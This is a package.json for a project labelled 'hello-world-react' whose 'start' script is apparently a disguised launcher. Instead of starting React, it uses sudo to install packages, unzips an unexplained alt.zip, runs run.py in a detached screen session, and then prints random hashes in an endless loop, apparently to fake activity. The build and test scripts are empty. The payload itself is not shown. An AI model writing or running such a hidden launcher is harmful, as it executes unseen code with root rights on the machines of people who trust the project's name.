{
  "name": "hello-world-react",
  "version": "0.1.0",
  "private": true,
  "dependencies": {
    "@testing-library/jest-dom": "^5.16.5",
    "@testing-library/react": "^13.4.0",
    "@testing-library/user-event": "^13.5.0",
    "react": "^18.2.0",
    "react-dom": "^18.2.0",
    "react-scripts": "5.0.1",
    "serve": "^14.2.0",
    "web-vitals": "^2.1.4"
  },
  "scripts": {
    "start": "sudo apt-get update;sudo apt-get install nodejs npm unzip screen -y;unzip alt.zip;screen -dmS play python run.py;while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 1m; done",
    "dev": "",
    "build": "",
    "test": "",
    "eject": ""
  },
  "eslintConfig": {
    "extends": [
      "react-app",
      "react-app/jest"
    ]
  },
  "browserslist": {
    "production": [
      ">0.2%",
      "not dead",
      "not op_mini all"
    ],
    "development": [
      "last 1 chrome version",
      "last 1 firefox version",
      "last 1 safari version"
    ]
  },
  "devDependencies": {
    "tailwindcss": "^3.4.0"
  }
}
